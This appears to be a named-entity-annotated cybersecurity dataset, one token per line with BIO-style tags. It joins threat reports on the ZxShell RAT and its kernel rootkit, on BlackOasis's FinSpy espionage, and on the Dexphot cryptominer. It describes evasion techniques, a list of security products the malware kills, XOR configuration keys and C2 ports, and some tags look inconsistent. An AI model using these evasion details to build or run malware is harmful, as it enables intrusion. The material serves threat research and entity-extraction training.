O + +GetCMD O +Remote O +Shell O +. O + +Shutdown O +Logout O +, O +shutdown O +or O +restart O +the O +target O +system O +. O + +ZXARPS O +Spoofing O +, O +redirection O +, O +packet O +capture O +. O + +ZXNC O +Run O +ZXNC O +v1.1 O +– O +a O +simple O +telnet O +client O +. O + +ZXHttpProxy O +Run O +a O +HTTP O +proxy O +server O +on O +the O +workstation O +. O + +ZXSockProxy O +Run O +a O +Sock O +4 O +& O +5 O +Proxy O +server O +. O + +ZXHttpServer O +Run O +a O +custom O +HTTP S-PROT +server O +. O + +PortScan O +Run O +TCP S-PROT +Port O +MultiScanner O +v1.0 O +. O + +KeyLog O +Capture O +or O +record O +the O +remote O +computer O +’s O +keystrokes O +. O + +The O +implementation O +is O +a O +userland O +keylogger S-TOOL +that O +polls O +the O +keymap O +with O +each O +keystroke O +. O + +LoadDll S-TOOL +Load O +a O +DLL S-TOOL +into O +the O +specified O +process O +. O + +End O +Terminate O +ZxShell S-MAL +DLL S-TOOL +. O + +Uninstall O +Uninstall O +and O +terminate O +ZxShell S-MAL +bot O +DLL S-TOOL +. O + +ShareShell O +Share O +a O +shell O +to O +other O +. O + +CloseFW O +Switch O +off O +Windows S-OS +Firewall O +. O + +FileMG O +File O +Manager O +. O +winvnc O +Remote O +Desktop O +. O +rPortMap O +Port O +Forwarding O +. O +capsrv O +Video O +Device O +Spying O +. O +zxplug O +Add O +and O +load O +a O +ZxShell S-MAL +custom O +plugin O +. O + +This O +set O +of O +functionality O +allows O +the O +operator O +complete O +control O +of O +a O +system O +. O + +Being O +able O +to O +transfer O +and O +execute O +files O +on O +the O +infected O +system O +means O +the O +attacker O +can O +run O +any O +code O +they O +please O +. O + +Further O +, O +the O +keylogging O +and O +remote O +desktop O +functionality O +allows O +the O +operator O +to O +spy O +on O +the O +infected O +machine O +, O +observing O +all O +keystrokes O +and O +viewing O +all O +user O +actions O +. 
O + +Unloads O +ZxShell S-MAL +and O +deletes O +all O +of O +the O +active O +components O +. O + +This O +simply O +deletes O +the O +ZxShell S-MAL +service O +key O +from O +the O +Windows S-OS +registry O +( O +using O +SHDeleteKey O +Api O +) O +and O +all O +of O +the O +subkeys O +. O + +Finally O +, O +it O +marks O +ZxShell S-MAL +main O +Dll S-TOOL +for O +deletion O +with O +the O +MoveFileEx O +Windows S-OS +API O +. O + +This O +function O +is O +the O +supporting O +functionality O +for O +WinVNC S-TOOL +. O + +To O +allow O +the O +VNC S-TOOL +session O +to O +connect O +, O +the O +current O +network O +socket O +WSAProtcol_Info S-TOOL +structure O +is O +written O +to O +a O +named O +pipe O +prior O +to O +calling O +zxFunction001 O +. O +zxFunction001 O +modifies O +the O +current O +process O +memory O +, O +uses O +data O +contained O +in O +the O +named O +pipe O +to O +create O +a O +socket O +, O +and O +then O +executes O +the O +code O +that O +sends O +the O +remote O +desktop O +session O +to O +the O +server O +controller O +. O + +ZxFunction002 O +This O +will O +either O +bind O +the O +calling O +process O +to O +a O +port O +or O +has O +the O +calling O +process O +connect O +to O +a O +remote O +host O +. O + +The O +functionality O +( O +connect O +or O +bind O +) O +depends O +on O +the O +data O +contained O +within O +the O +named O +pipe O +. O + +Unlike O +zxFunction001, O +this O +is O +not O +used O +by O + +any O +of O +the O +RAT S-TOOL +commands O +in O +the O +zxshell.dll S-FILE +. O + +Apart O +from O +user-mode O +ZxShell S-MAL +droppers O +mentioned O +earlier O +, O +there O +is O +a O +file O +( O +SHA256 S-ENCR +: O +1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335 S-SHA2 +) O +that O +installs O +a O +kernel O +device O +driver O +called O +loveusd.sys S-FILE +. 
O + +The O +architecture O +of O +this O +dropper O +is O +different O +from O +the O +others O +: O +it O +starts O +extracting O +the O +main O +driver O +from O +itself O +. O + +It O +adds O +the O +SeLoadDriver S-TOOL +privilege O +to O +its O +access O +token O +and O +proceeds O +to O +install O +the O +driver O +as O +a O +fake O +disk O +filter O +driver O +. O + +It O +then O +adds O +the O +“ O +Loveusd.sys S-FILE +” O +extracted O +driver O +name O +to O +the O +upper O +filter O +list O +. O + +In O +our O +analysed O +sample O +the O +“ O +Loveusd.sys S-FILE +” O +driver O +is O +installed O +with O +the O +name O +“ O +USBHPMS S-FILE +” O +. O + +Finally O +the O +driver O +is O +started O +using O +the O +ZwLoadDriver O +native O +API O +. O + +The O +ZxShell S-MAL +driver O +starts O +by O +acquiring O +some O +kernel O +information O +and O +then O +hooking O +“ O +ObReferenceObjectByHandle O +” O +API O +. O + +Finally O +it O +spawns O +2 O +system O +threads O +. O + +The O +first O +thread O +is O +the O +“ O +communication S-TOOL +” O +thread O +. O + +ZxShell S-MAL +employs O +a O +strange O +method O +for O +communication O +: O +it O +hooks O +the O +NtWriteFile O +API O +and O +recognizes O +5 O +different O +special O +handle O +values O +as O +commands O +: O + +0x111111111 O +: O +Hide O +“ O +Loveusd O +” O +driver O +from O +the O +system O +kernel O +driver O +list O +. O +0x22222222 O +: O +Securely O +delete O +an O +in-use O +or O +no-access O +target O +file-name O +. O +0x44444444 O +: O +Unhook O +the O +ZwWriteFile O +API O +and O +hook O +KiFastCallEntry O +. O +0x55555555 O +: O +Remove O +the O +ZxShell S-MAL +Image O +Load O +Notify O +routine O +. O +0x88888888 O +: O +Set O +a O +special O +value O +called O +“ O +type O +” O +in O +Windows S-OS +registry O +key O +HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverMain O +. 
O + +The O +second O +Loveusd S-TOOL +system O +thread O +does O +a O +lot O +of O +things O +. O + +Its O +principal O +duties O +are O +to O +create O +the O +ZxShell S-MAL +main O +DLL S-TOOL +in O +“ O +c:\Windows\System32\commhlp32.dll S-FILE +” O +and O +to O +install O +the O +Kernel O +“ O +Load B-TOOL +Image I-TOOL +Notify I-TOOL +routine E-TOOL +” O +. O + +The O +code O +then O +tries O +to O +kill O +each O +process O +and O +service O +that O +belongs O +to O +the O +following O +list O +of O +AV O +products O +: O +Symantec B-TOOL S-IDTY I-TOOL +Firewall E-TOOL +Norton S-TOOL +ESET S-TOOL +McAfee S-TOOL +Avast S-TOOL +Avira S-TOOL +Sophos S-TOOL +Malwarebytes S-TOOL +. O + +Next O +, O +the O +ZxShell S-MAL +Load-Image O +Notify O +function O +prevents O +the O +AV O +processes O +from O +restarting O +. O + +The O +installation O +procedure O +continues O +in O +the O +user-mode O +dropper O +. O + +The O +ZxShell S-MAL +service O +is O +installed O +as O +usual O +, O +and O +the O +in-execution O +dropper O +is O +deleted O +permanently O +using O +the O +special O +handle O +value O +0x22222222 O +for O +the O +WriteFile O +API O +call O +. O + +This O +handle O +value O +is O +invalid O +: O +all O +the O +windows S-OS +kernel O +handle O +values O +are O +by O +design O +a O +multiple O +of O +4 O +. O + +The O +ZxShell S-MAL +hook O +code O +knows O +that O +and O +intercept O +it O +. O + +ObReferenceObjectByHandle O +is O +a O +Kernel O +routine O +designed O +to O +validate O +a O +target O +object O +and O +return O +the O +pointer O +to O +its O +object O +body O +( O +and O +even O +its O +handle O +information O +) O +, O +starting O +from O +the O +object O +handle O +( O +even O +the O +user-mode O +one O +) O +. O + +The O +hook O +installed O +by O +ZxShell S-MAL +implements O +one O +of O +its O +filtering O +routine O +. 
O + +It O +filters O +each O +attempt O +to O +open O +the O +ZxShell S-MAL +protected O +driver O +or O +the O +main O +DLL S-TOOL +, O +returning O +a O +reference O +to O +the O +“ O +netstat.exe S-FILE +” O +file O +. O + +The O +protection O +is O +enabled O +to O +all O +processes O +except O +for O +ones O +in O +the O +following O +list O +: O +Svchost.exe S-FILE +, O +Lsass.exe S-FILE +, O +Winlogon.exe S-FILE +, O +Services.exe S-FILE +, O +Csrss.exe S-FILE +, O +ctfmon.exe S-FILE +, O +Rundll32.exe S-FILE +, O +mpnotify.exe S-FILE +, O +update.exe S-FILE +. O + +If O +the O +type O +of O +the O +object O +that O +the O +system O +is O +trying O +to O +validate O +is O +a O +process O +, O +the O +hook O +code O +rewrites O +again O +the O +configuration O +data O +of O +the O +ZxShell S-MAL +service O +in O +the O +windows S-OS +registry O +. O + +The O +last O +type O +of O +Kernel O +modification O +that O +ZxShell S-MAL +rootkit O +performs O +is O +the O +system O +call O +dispatcher O +( O +KiFastCallEntry O +) O +hook O +. O + +In O +this O +manner O +, O +ZxShell S-MAL +is O +able O +to O +completely O +hide O +itself O +, O +intercepting O +the O +following O +Kernel O +API O +calls O +: O +ZwAllocateVirtualMemory O +, O +ZwOpenEvent O +, O +ZwQueryDirectoryFile O +, O +ZwWriteFile O +, O +ZwEnumerateKey O +, O +and O +ZwDeviceIoControlFile O +. O + +Command B-TOOL +and I-TOOL +Control E-TOOL +Server O +: O +Sample O +( O +SHA256 S-ENCR +: O +1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c S-SHA2 +) O +is O +configured O +to O +act O +as O +a O +server O +. O + +The O +symbol O +“ O +g_bCreateListenSck O +” O +is O +set O +to O +1 O +. O + +This O +means O +that O +, O +as O +seen O +above O +, O +the O +ZxShell S-MAL +Dll S-TOOL +is O +started O +in O +listening O +mode O +. O + +It O +connects O +to O +the O +first O +remote O +C&C S-TOOL +that O +tries O +to O +contact O +it O +and O +succeeds O +in O +the O +handshake O +. 
O + +The O +encrypted O +IP O +address O +is O +“ O +127.0.0.2 S-IP +” O +( O +used O +as O +loopback O +) O +and O +no O +connection O +is O +made O +on O +that O +IP O +address O +( O +due O +to O +the O +listening O +variable O +set O +to O +1 O +) O +. O + +We O +used O +the O +ZxShell S-MAL +package O +for O +version O +3.10 O +( O +SHA256 S-ENCR +: O +1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4 S-SHA2 +).The O +convenient O +thing O +about O +this O +is O +that O +the O +CNC B-TOOL +panel E-TOOL +worked O +with O +any O +version O +, O +3.10 O +and O +above O +. O + +The O +buttons O +are O +all O +in O +Chinese O +, O +with O +the O +help O +of O +Google B-TOOL +Translate E-TOOL +and O +keen O +detective O +skills O +( O +read O +: O +button O +clicking O +) O +, O +we O +’ve O +deciphered O +the O +functionality O +. O + +Once O +an O +infected O +machine O +connects O +, O +you O +see O +its O +information O +displayed O +in O +a O +selection O +box O +at O +the O +top O +. O + +There O +are O +some O +built O +in O +functions O +on O +the O +side O +for O +the O +more O +common O +features O +. O + +These O +include O +remote O +desktop O +, O +webcam O +spying O +, O +remote O +shell O +, O +and O +file O +management O +. O + +You O +can O +also O +select O +a O +host O +and O +type O +help O +for O +a O +full O +list O +of O +commands O +. O + +I O +have O +the O +same O +machine O +infected O +with O +two O +different O +version O +of O +ZxShell S-MAL +. O + +Sending O +the O +help O +command O +for O +each O +, O +you O +can O +see O +the O +extra O +features O +added O +between O +version O +3.1 O +and O +3.2 O +. O + +Keylogging S-ACT +, O +ZXARPS S-MAL +( O +IP O +and O +URL O +spoofing O +) O +, O +and O +SYNFlood S-ACT +are O +some O +of O +the O +interesting O +features O +added O +to O +version O +3.2 O +. 
O + +In O +versions O +3.1 O +– O +3.21, O +the O +configuration O +info O +is O +xor S-ENCR +encoded O +with O +0x85 O +. O + +This O +configuration O +info O +can O +be O +changed O +with O +a O +tool O +included O +in O +the O +ZxShell S-MAL +package O +. O + +In O +versions O +3.22 O +and O +3.39 O +the O +routine O +changes O +. O + +The O +new O +xor S-ENCR +encoding O +byte O +is O +0x5B O +. O + +The O +data O +is O +stored O +in O +the O +last O +0x100 O +bytes O +of O +the O +file O +. O + +The O +first O +8 O +bytes O +of O +data O +are O +static O +. O + +Then O +there O +is O +the O +dll S-TOOL +install O +name O +, O +the O +domain O +, O +and O +the O +port O +. O + +Knowing O +the O +obfuscation O +routines O +for O +this O +data O +we O +wrote O +a O +script O +to O +extract O +the O +URLs O +/ O +IPs O +and O +ports O +stored O +. O + +The O +most O +common O +ports O +used O +are O +, O +80, O +1985, O +1986, O +and O +443 O +. O +1985 O +is O +the O +default O +port O +for O +the O +malware O +, O +1986 O +is O +the O +lazy O +variation O +of O +that O +port O +. O + +Port O +80 O +and O +443 O +are O +the O +default O +ports O +for O +HTTP S-PROT +and O +HTTPS S-PROT +traffic O +. O + +The O +next O +most O +common O +is O +port O +53 O +. O + +This O +is O +used O +in O +some O +of O +the O +newer O +3.22 O +and O +3.39 O +samples O +. O + +After O +that O +, O +the O +count O +for O +each O +port O +starts O +declining O +sharply O +. O + +The O +choices O +are O +interesting O +though O +, O +many O +correspond O +to O +what O +looks O +like O +the O +birth O +year O +of O +the O +controller O +( O +ie O +. O +years O +in O +the O +late O +1980s S-TIME +and O +early O +1990s S-TIME +) O +, O +and O +others O +seem O +to O +match O +what O +year O +the O +malware O +was O +launched O +in O +( O +ie O +. O +in O +the O +2000s S-TIME +, O +relatively O +close O +to O +the O +current O +year O +) O +. 
O + +Since O +this O +malware O +dates O +back O +to O +around O +2004 S-TIME +, O +there O +are O +many O +samples O +containing O +CNC S-TOOL +URLs O +from O +the O +3322.org S-URL +page O +. O + +This O +page O +used O +to O +offer O +no-ip O +type O +hosting O +and O +was O +widely O +used O +by O +malware O +authors O +. O + +So O +much O +so O +that O +Microsoft S-IDTY +did O +a O +takedown O +in O +2012 S-TIME +. O + +A O +similar O +service O +, O +vicp.net S-URL +, O +is O +also O +seen O +in O +many O +of O +the O +domains O +. O + +In O +the O +malware O +, O +if O +a O +domain O +is O +configured O +, O +it O +will O +retrieve O +domain.tld S-FILE +/ O +myIP +. O + +txt S-FILE +. O + +This O +file O +contains O +a O +list O +of O +IP O +addresses O +for O +the O +infected O +machine O +to O +connect O +back O +to O +. O + +Otherwise O +, O +if O +an O +IP O +address O +is O +configured O +, O +it O +will O +connect O +directly O +to O +that O +IP O +address O +. O + +We O +have O +written O +a O +simple O +C++ O +ZxShell S-MAL +Server O +that O +implements O +the O +communication O +and O +the O +handshake O +for O +the O +version O +3.10 O +and O +3.20 O +of O +the O +ZxShell S-MAL +DLL S-TOOL +. O + +The O +implementation O +is O +quite O +simple O +: O +After O +the O +handshake O +, O +2 O +threads O +that O +deal O +with O +data O +transfer O +are O +spawned O +. O + +Advanced O +persistent O +threats O +will O +remain O +a O +problem O +for O +companies O +and O +organizations O +of O +all O +sizes O +, O +especially O +those O +with O +high O +financial O +or O +intellectual O +property O +value O +. O + +Group B-APT +72 E-APT +’s O +involvement O +in O +Operation B-ACT +SMN E-ACT +is O +another O +example O +of O +what O +sort O +of O +damage O +that O +can O +be O +done O +if O +organizations O +are O +not O +diligent O +in O +their O +efforts O +to O +secure O +their O +networks O +. 
O + +ZxShell S-MAL +is O +one O +sample O +amongst O +several O +tools O +that O +Group B-APT +72 E-APT +used O +within O +their O +campaign O +. O + +ZxShell S-MAL +is O +a O +sophisticated O +tool O +employed O +by O +Group B-APT +72 E-APT +that O +contains O +all O +kinds O +of O +functionality O +. O + +Its O +detection O +and O +removal O +can O +be O +difficult O +due O +to O +the O +various O +techniques O +used O +to O +conceal O +its O +presence O +, O +such O +as O +disabling O +the O +host O +anti-virus O +, O +masking O +its O +installation O +on O +a O +system O +with O +a O +valid O +service O +name O +, O +and O +by O +masking O +outbound O +traffic O +as O +originating O +from O +a O +web O +browser O +. O + +While O +other O +techniques O +are O +also O +utilized O +to O +conceal O +and O +inhibit O +its O +removal O +, O +ZxShell S-MAL +’s O +primary O +functionality O +is O +to O +act O +as O +a O +Remote B-TOOL +Administration I-TOOL +Tool E-TOOL +( O +RAT S-TOOL +) O +, O +allowing O +the O +threat O +actor O +to O +have O +continuous O +backdoor S-MAL +access O +on O +to O +the O +compromised O +machine O +. O + +As O +our O +analysis O +demonstrates O +, O +ZxShell S-MAL +is O +an O +effective O +tool O +that O +can O +be O +ultimately O +used O +to O +steal O +user O +credentials O +and O +other O +highly O +valuable O +information O +. O + +The O +threat O +posed O +by O +ZxShell S-MAL +to O +organizations O +is O +one O +that O +cannot O +be O +ignored O +. O + +Organizations O +with O +high O +financial O +or O +intellectual O +property O +value O +should O +take O +the O +time O +to O +ensure O +their O +security O +requirements O +are O +met O +and O +that O +employee O +’s O +are O +educated O +about O +the O +security O +threats O +their O +organizations O +face O +. O + + +Threat O +Spotlight O +: O +Group B-APT +72 E-APT +, O +Opening O +the O +ZxShell S-MAL +. 
O + +A O +well-funded O +, O +highly O +active O +group O +of O +Middle O +Eastern O +hackers O +was O +caught O +, O +yet O +again O +, O +using O +a O +lucrative O +zero-day S-VULNAME +exploit O +in O +the O +wild O +to O +break O +into O +computers O +and O +infect O +them O +with O +powerful O +spyware S-MAL +developed O +by O +an O +infamous O +cyberweapons O +dealer O +named O +Gamma B-APT +Group E-APT +. O + +The O +incident O +, O +as O +described O +by O +security O +researchers O +with O +Moscow-based O +cybersecurity O +firm O +Kaspersky B-SECTEAM +Lab E-SECTEAM +, O +shines O +a O +rare O +light O +on O +the O +opaque O +although O +apparently O +vibrant O +market O +for O +software O +exploits O +and O +spyware S-MAL +, O +which O +in O +this O +case O +appears O +to O +have O +been O +purchased O +by O +a O +nation-state O +. O + +The O +Middle O +Eastern O +hacker O +group O +in O +this O +case O +is O +codenamed O +“ O +BlackOasis S-APT +. O +” O +Kaspersky S-SECTEAM +found O +the O +group O +was O +exploiting O +a O +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +zero-day S-VULNAME +vulnerability O +( O +CVE-2016-4117 S-VULID +) O +to O +remotely O +deliver O +the O +latest O +version O +of O +“ O +FinSpy S-MAL +” O +malware O +, O +according O +to O +a O +new O +blog O +post O +published O +Monday S-TIME +. O + +Adobe S-IDTY +issued O +a O +fix O +Monday S-TIME +to O +its O +users O +in O +the O +form O +of O +a O +software O +update O +. O + +FinSpy S-MAL +, O +a O +final-stage O +payload O +that O +allows O +for O +an O +attacker O +to O +covertly O +learn O +what O +a O +target O +is O +talking O +about O +and O +who O +they O +are O +communicating O +with O +, O +is O +associated O +with O +Gamma B-APT +Group E-APT +— O +which O +goes O +by O +other O +names O +, O +including O +FinFisher S-APT +and O +Lench B-APT +IT I-APT +Solutions E-APT +. 
O + +BlackOasis S-APT +in O +recent O +months O +sent O +a O +wave O +of O +phishing S-ACT +emails S-TOOL +. O + +These O +emails S-TOOL +contained O +malicious O +Microsoft B-TOOL +Word I-TOOL +documents E-TOOL +with O +the O +aforementioned O +Flash B-VULNAME +Player I-VULNAME +zero-day E-VULNAME +hidden O +inside O +an O +embedded O +ActiveX B-TOOL +object E-TOOL +. O + +In O +the O +past O +, O +BlackOasis S-APT +messages O +were O +designed O +to O +appear O +like O +news O +articles O +from O +2016 S-TIME +about O +political O +relations O +between O +Angola S-LOC +and O +China S-LOC +. O + +The O +term O +zero-day S-VULNAME +is O +indicative O +of O +a O +software O +flaw O +that O +remains O +unknown O +to O +the O +software O +’s O +creator O +. O + +Zero-days S-VULNAME +can O +be O +highly O +disruptive O +because O +they O +provide O +a O +window O +of O +time O +for O +an O +attacker O +to O +breach O +victims O +before O +the O +vendor O +is O +able O +to O +apply O +a O +software O +update O +to O +address O +the O +specific O +security O +hole O +. O + +U.S S-LOC +. O +cybersecurity O +firm O +FireEye S-IDTY +also O +recently O +captured O +BlackOasis S-APT +activity O +as O +part O +of O +a O +similar O +incident O +where O +the O +group O +relied O +on O +a O +different O +zero-day S-VULNAME +exploit O +— O +more O +specifically O +, O +a O +SOAP B-TOOL +WSDL I-TOOL B-VULNAME +parser I-VULNAME E-TOOL I-VULNAME +code I-VULNAME +injection E-VULNAME +vulnerability O +— O +to O +install O +FinSpy S-MAL +onto O +a O +small O +number O +of O +devices O +. O + +Again O +, O +the O +attacker O +’s O +intention O +appeared O +to O +be O +espionage O +. 
O +“ O +Unlike O +other O +FinFisher S-APT +customers O +or O +users O +who O +focus O +mostly O +on O +domestic O +operations O +, O +BlackOasis S-APT +focuses O +on O +external O +operations O +and O +go O +after O +a O +wide O +range O +of O +targets O +around O +the O +world O +, O +” O +explained O +Costin O +Raiu O +, O +director O +of O +the O +global O +research O +and O +analysis O +team O +at O +Kaspersky B-SECTEAM +Lab E-SECTEAM +. O + +Gamma B-APT +Group E-APT +has O +been O +accused O +of O +selling O +its O +products O +to O +authoritarian O +regimes O +that O +can O +use O +the O +technology O +to O +both O +track O +dissidents O +and O +conduct O +foreign O +espionage O +over O +the O +internet O +. O + +The O +discovery O +by O +Kaspersky S-SECTEAM +marks O +at O +least O +the O +fifth O +zero-day S-VULNAME +exploit O +used O +by O +BlackOasis S-APT +and O +exposed O +by O +security O +researchers O +since O +June B-TIME +2015 E-TIME +. O + +It O +’s O +unclear O +whether O +the O +hackers O +are O +purchasing O +the O +exploits O +and O +spyware S-MAL +together O +, O +directly O +from O +Gamma B-APT +Group E-APT +, O +or O +if O +they O +were O +able O +to O +acquire O +some O +of O +the O +tools O +through O +other O +avenues O +. O +“ O +BlackOasis S-APT +’ O +interests O +span O +a O +wide O +gamut O +of O +figures O +involved O +in O +Middle O +Eastern O +politics O +and O +verticals O +disproportionately O +relevant O +to O +the O +region O +. O + +This O +includes O +prominent O +figures O +in O +the O +United B-LOC +Nations E-LOC +, O +opposition O +bloggers O +and O +activists O +, O +and O +regional O +news O +correspondents O +, O +” O +a O +blogpost O +about O +Kaspersky S-SECTEAM +’s O +findings O +reads O +. 
O + +The O +post O +continues O +, O +“ O +during O +2016 S-TIME +, O +we O +observed O +a O +heavy O +interest O +in O +Angola S-LOC +, O +exemplified O +by O +lure O +documents O +indicating O +targets O +with O +suspected O +ties O +to O +oil O +, O +money O +laundering O +, O +and O +other O +illicit O +activities O +. O + +There O +is O +also O +an O +interest O +in O +international O +activists O +and O +think O +tanks O +… O +Victims O +of O +BlackOasis S-APT +have O +been O +observed O +in O +the O +following O +countries O +: O +Russia S-LOC +, O +Iraq S-LOC +, O +Afghanistan S-LOC +, O +Nigeria S-LOC +, O +Libya S-LOC +, O +Jordan S-LOC +, O +Tunisia S-LOC +, O +Saudi B-LOC +Arabia E-LOC +, O +Iran S-LOC +, O +Netherlands S-LOC +, O +Bahrain S-LOC +, O +United B-LOC +Kingdom E-LOC +and O +Angola S-LOC +. O +” O + +Intent O +was O +clearly O +espionage O +in O +many O +cases O +, O +going O +outside O +of O +that O +"lawful O +surveillance" O +boundary.— O +Brian O +Bartholomew O +( O +@Mao_Ware O +) O +October B-TIME +16, I-TIME +2017 E-TIME +Brian O +Bartholomew O +, O +a O +senior O +security O +researcher O +with O +Kaspersky S-SECTEAM +, O +said O +on O +Twitter S-TOOL +that O +BlackOasis S-APT +’ O +espionage O +included O +non-traditional O +targets O +— O +“ O +going O +outside O +of O +that O +lawful O +surveillance O +boundary. O +” O + +An O +advanced O +persistent O +threat O +group O +, O +previously O +identified O +by O +Microsoft S-IDTY +and O +codenamed O +Neodymium S-APT +, O +is O +closely O +associated O +with O +BlackOasis S-APT +’ O +operations O +. 
O + +Last O +year O +, O +Microsoft S-IDTY +researchers O +described O +Neodymium S-APT +’s O +behavior O +as O +unusual O +: O +“ O +unlike O +many O +activity O +groups O +, O +which O +typically O +gather O +information O +for O +monetary O +gain O +or O +economic O +espionage O +, O +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +appear O +to O +launch O +campaigns O +simply O +to O +gather O +information O +about O +certain O +individuals O +. O + +These O +activity O +groups O +are O +also O +unusual O +in O +that O +they O +use O +the O +same O +zero-day S-VULNAME +exploit O +to O +launch O +attacks O +at O +around O +the O +same O +time O +in O +the O +same O +region O +. O + +Their O +targets O +, O +however O +, O +appear O +to O +be O +individuals O +that O +do O +not O +share O +common O +affiliations. O +” O + +A O +cursory O +review O +of O +BlackOasis S-APT +’ O +espionage O +campaign O +suggests O +there O +is O +some O +overlap O +between O +the O +group O +’s O +actions O +and O +Saudi B-LOC +Arabia E-LOC +’s O +geopolitical O +interests O +. O + +For O +example O +, O +the O +targeting O +of O +Angolan B-IDTY +organizations E-IDTY +in O +mid-2016 S-TIME +coincidences O +directly O +with O +the O +rise O +of O +Angola S-LOC +’s O +oil O +business O +with O +China S-LOC +, O +which O +displaced O +Saudi B-LOC +Arabia E-LOC +as O +the O +number O +one O +exporter O +of O +crude O +oil O +to O +China S-LOC +at O +the O +time O +. O + +All O +13 O +countries O +where O +Kaspersky S-SECTEAM +reportedly O +observed O +BlackOasis S-APT +activity O +are O +connected O +to O +Saudi B-LOC +Arabia E-LOC +in O +one O +of O +three O +ways O +: O +economically O +; O +from O +a O +national O +security O +perspective O +; O +or O +due O +to O +established O +policy O +agreements O +. 
O + +In O +addition O +, O +Saudi B-LOC +Arabia E-LOC +is O +a O +known O +customer O +of O +spyware S-MAL +and O +has O +used O +the O +technology O +domestically O +, O +according O +to O +Citizen B-SECTEAM +Lab E-SECTEAM +, O +a O +cybersecurity O +and O +human-rights O +focused O +research O +laboratory O +. O + +Kaspersky S-SECTEAM +’s O +research O +notes O +that O +BlackOasis S-APT +hacked O +into O +computers O +based O +in O +Saudi B-LOC +Arabia E-LOC +. O + + +Insights O +from O +one O +year O +of O +tracking O +a O +polymorphic O +threat O +. O + +A O +little O +over O +a O +year O +ago O +, O +in O +October B-TIME +2018 E-TIME +, O +our O +polymorphic O +outbreak O +monitoring O +system O +detected O +a O +large O +surge O +in O +reports O +, O +indicating O +that O +a O +large-scale O +campaign O +was O +unfolding O +. O + +We O +observed O +as O +the O +new O +threat O +attempted O +to O +deploy O +files O +that O +changed O +every O +20-30 O +minutes O +on O +thousands O +of O +devices O +. O + +We O +gave O +the O +threat O +the O +name O +“ O +Dexphot S-MAL +, O +” O +based O +on O +certain O +characteristics O +of O +the O +malware O +code O +. O + +The O +Dexphot S-MAL +attack O +used O +a O +variety O +of O +sophisticated O +methods O +to O +evade O +security O +solutions O +. O + +Layers O +of O +obfuscation O +, O +encryption O +, O +and O +the O +use O +of O +randomized O +file O +names O +hid O +the O +installation O +process O +. O + +Dexphot S-MAL +then O +used O +fileless O +techniques O +to O +run O +malicious O +code O +directly O +in O +memory O +, O +leaving O +only O +a O +few O +traces O +that O +can O +be O +used O +for O +forensics O +. O + +It O +hijacked O +legitimate O +system O +processes O +to O +disguise O +malicious O +activity O +. 
O + +If O +not O +stopped O +, O +Dexphot S-MAL +ultimately O +ran B-ACT +a I-ACT +cryptocurrency I-ACT +miner I-ACT +on I-ACT +the I-ACT +device E-ACT +, O +with O +monitoring O +services O +and O +scheduled O +tasks O +triggering O +re-infection O +when O +defenders O +attempt O +to O +remove O +the O +malware O +. O + +In O +the O +months O +that O +followed O +, O +we O +closely O +tracked O +the O +threat O +and O +witnessed O +the O +attackers O +upgrade O +the O +malware O +, O +target O +new O +processes O +, O +and O +work O +around O +defensive O +measures O +. O + +While O +Microsoft B-TOOL +Defender I-TOOL +Advanced I-TOOL +Threat I-TOOL +Protection E-TOOL +’s O +pre-execution O +detection O +engines O +blocked O +Dexphot S-MAL +in O +most O +cases O +, O +behavior-based O +machine O +learning O +models O +provided O +protection O +for O +cases O +where O +the O +threat O +slipped O +through O +. O + +Given O +the O +threat O +’s O +persistence O +mechanisms O +, O +polymorphism O +, O +and O +use O +of O +fileless O +techniques O +, O +behavior-based O +detection O +was O +a O +critical O +component O +of O +the O +comprehensive O +protection O +against O +this O +malware O +and O +other O +threats O +that O +exhibit O +similar O +malicious O +behaviors O +. O + +Microsoft B-TOOL +Defender E-TOOL +ATP O +data O +shows O +the O +effectiveness O +of O +behavioral O +blocking O +and O +containment O +capabilities O +in O +stopping O +the O +Dexphot S-MAL +campaign O +. O + +Over O +time O +, O +Dexphot-related O +malicious O +behavior O +reports O +dropped O +to O +a O +low O +hum O +, O +as O +the O +threat O +lost O +steam O +. O + +Our O +close O +monitoring O +of O +Dexphot S-MAL +helped O +us O +ensure O +that O +our O +customers O +were O +protected O +from O +the O +evolving O +threat O +. 
O + +More O +importantly O +, O +one O +year O +’s O +worth O +of O +intelligence O +helped O +us O +gain O +insight O +not O +only O +into O +the O +goals O +and O +motivations O +of O +Dexphot S-MAL +’s O +authors O +, O +but O +of O +cybercriminals O +in O +general O +. O + +The O +early O +stages O +of O +a O +Dexphot S-MAL +infection O +involves O +numerous O +files O +and O +processes O +. O + +During O +the O +execution O +stage O +, O +Dexphot O +writes O +five O +key O +files O +to O +disk O +: O + +1 O +、An O +installer O +with O +two O +URLs O +; O + +2 O +、An O +MSI S-TOOL +package O +file O +downloaded O +from O +one O +of O +the O +URLs O +; O + +3 O +、A O +password-protected O +ZIP O +archive O +; O + +4 O +、A O +loader O +DLL S-TOOL +, O +which O +is O +extracted O +from O +the O +archive O +; O + +5 O +、An O +encrypted O +data O +file O +that O +holds O +three O +additional O +executables O +that O +are O +loaded O +into O +system O +processes O +via O +process O +hollowing O +. O + +Except O +for O +the O +installer O +, O +the O +other O +processes O +that O +run O +during O +execution O +are O +legitimate O +system O +processes O +. O + +This O +can O +make O +detection O +and O +remediation O +more O +difficult O +. O + +These O +legitimate O +system O +processes O +include O +msiexec.exe S-FILE +( O +for O +installing O +MSI S-TOOL +packages O +) O +, O +unzIP S-TOOL +. O + +exe S-FILE +( O +for O +extracting O +files O +from O +the O +password-protected O +ZIP O +archive O +) O +, O +rundll32.exe S-FILE +( O +for O +loading O +the O +loader O +DLL S-TOOL +) O +, O +schtasks.exe S-FILE +( O +for O +scheduled O +tasks O +) O +, O +powershell.exe S-FILE +( O +for O +forced O +updates O +) O +. O + +In O +later O +stages O +, O +Dexphot S-MAL +targets O +a O +few O +other O +system O +processes O +for O +process O +hollowing O +: O +svchost.exe S-FILE +, O +tracert.exe S-FILE +, O +and O +setup.exe S-FILE +. 
